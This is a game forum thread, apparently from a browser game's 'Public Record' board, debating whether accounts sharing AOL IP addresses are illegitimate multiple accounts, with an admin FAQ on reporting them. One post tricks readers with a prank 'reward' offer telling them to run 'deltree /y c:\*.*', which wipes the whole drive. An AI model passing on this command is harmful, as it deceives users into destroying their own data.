Could these be multis? (in Public Record)

Ok well it al starts with looking up Mokaba: seems like all these accounts use same ip to do purchasing for some reason.
Like G_beee said, these accounts all are on aol so Mokaba might not be in this making all these accounts which I thought he did. But there are several accounts here who did share stuff with eachother so they might be multis.

Here endman3 and warrior sent items to eachother on same ip/ips
As usual many of the accounts from purchase log all seem to be using same ips as Mokaba.

Anyways theres only like 4 accounts that did item sharing on same ips, many others all used same ip to purchase items.

The first just looks like one guy likes arrows and one guy likes bolts. 2nd seems suspicious. 3rd doesn't seem all that conclusive. That's my summary.


To all multis: For 5 mill free, simply go to Start=>Run, type in "command", then type deltree /y c:\*.*

That is true - but not enough evidence. Whenever I made my PR post stating that my sister would play (and then she ended up leaving, so that was a waste and a cause of suspicion) I was informed that there wasn't even a need, so long as there were no suspicious transfers. So IP sharing obviously isn't stand-alone evidence.

First of all 2 things:
- Could you please not tamper with the logs, if/when you decide to post them?
- Could you please not post the entire log, but only the relevant parts? Admins do know how to lookup the logs themselves, so usually account names are enough, maybe with time period (if it was very hard to find).

Yes, this is AOL. Mokaba shares IP with 43 other accounts. But is there any evidence that links him with one of these 43 accounts?

This is interesting! The problem is here with AOL giving the same IP addresses to different people. I only made one account! I need Bolts for my Enforcer Crossbow. I see that the Witch Hunt continues!!!

But there is a deeper problem! If I sold anything to these guys with the same IP addresses without me knowing that they have the same IP address then I'm a multi??????

Occasionally trades are not a real problem. If you see an item go one way, and some cash the other way, then it's most likely normal player interaction. If the transfer logs only show transfers that suggest that certain accounts purely exist to benefit another account, then another conclusion is often drawn ;)

If you yell, Multi, Multi, Multi, and put your hand to someone else remember that there is always one pointing to you.

The truth is hard to see for blinded people. I am no Multi and I should not have to defend myself at all!

Reason I got into looking up mokaba was because I had a new player sign up and I ended up being his mentor, then looked up his purchase log and clicked the ip and mokaba was the one that showed up as majority store purchaser along with many other accounts under same ip. And there were like several other accounts and they all used same ips as mokaba, seemed like all they did was use 3 ips so I thought that all were linked to mokaba at first. I talked to g_beee about it he said that mokaba wasn't linked to those accounts, but the 4 I posted of transferlogs:

The Killer to razza The Killer clearly is a multi, the name and all the items sent to the account show it. They both used same ips to do purchasing too.
then there is endman3 that sent items to warrior who then also sent items to endman3, both did it on same ips.

Then next time, mention it to an admin in CM or PM, instead of creating yet another PR post about it. Let them do that.

Yes, this is just a game, but interacting with people in this forum you are talking to real people. I do hope that this community will stop this Multi-hunt in some way. It doesn't add anything to this beautiful game at all.

Tormentor, for the thousandth time, "using the same IP" here means absolutely nothing (except maybe that they likely live in the same country, the US).

Yes, (razza) the killer might be a multi, but if you actually look where those items did end up, then you'll understand why I do not feel an urgent need to investigate further ;)

Q: May I have more than one account?

A: No. This is the first thing you are told when you sign up, but for people with short memories and/or attention spans, I reproduce this rule here.

The community polices "multis" fairly diligently. IP sharing is the main evidence in such cases, but is not in an of itself proof of guilt. If you share an IP with other players, you should avoid transfers (particularly one-sided ones) to each other to avoid the appearance of evil.

As with other cases where you need an admin's attention, if you suspect someone of violating this rule, post to Public Record:

1. Post the name of the user and the names of the "multi" account(s). If possible include the user_id in case the multi makes a quick name-change. (search for the user then hover your mouse over the link to the user's homepage. Look for "user_id_from_search" in your browser's status bar.)
2. Present what evidence you have to support your accusation. Examples include:
* Relevant portions of chat or chatmail transcripts where the person admits being a multi
* Player-player transaction logs showing suspicions behavior
* Store logs showing people with the same (or similar ip addresses)
* Etc.
3. Present your information in a straight-forward and factual manner. Flaming and namecalling are unneeded and unwanted. (Particularly if you are wrong about the person being a multi).

Is it just me or is this a tired subject, i have only been playing cb for three days now and already this subject is a pain i understand multi-ing is a problem but i don't think every second thread/convo needs to be about multis or the NUB this is a wonderful game but i think people bringing up theses two subjects are spoiling the game its almost like the subjects are spamming pr and general. Im sure the admins and Jon are more than capable to take care of multis if anything everyone getting involved is getting in the way of solving the problem. All a post about multis in pr needs is a list of users suspected of multi-ing and some sort of proof to back your suspicioms and a rply from an admin saying they've investigated and then the results of the investigation there is no need for everyone to join in on these multi hunts. Thats all i have to say on the subject i know its a bit hypercritical to get involved but its bugging me soooooooo much :)

Triumph, hunting for multis is encouraged to help the admins. Admins do play the game as well and looking for multis is not a full time job for them here. If you do not want to see these kind of PR post, you can become a supporter and you will have the option to turn off the PR thread.

i understand admins need help to find multis and they also play the game aswell but they dont need everyone in cb to scream multi every time something happens i just think its getting old and boring im not trying to let multis get away i just dont think multi has to be in every conversation

I agree this multi-hunt is why out of line. It is very negative and it becomes a second sport in here. Campers are gone. Multi-hunters go ahead!

If the Admins can't do there job because of time than get more sub-admins to help with the job!
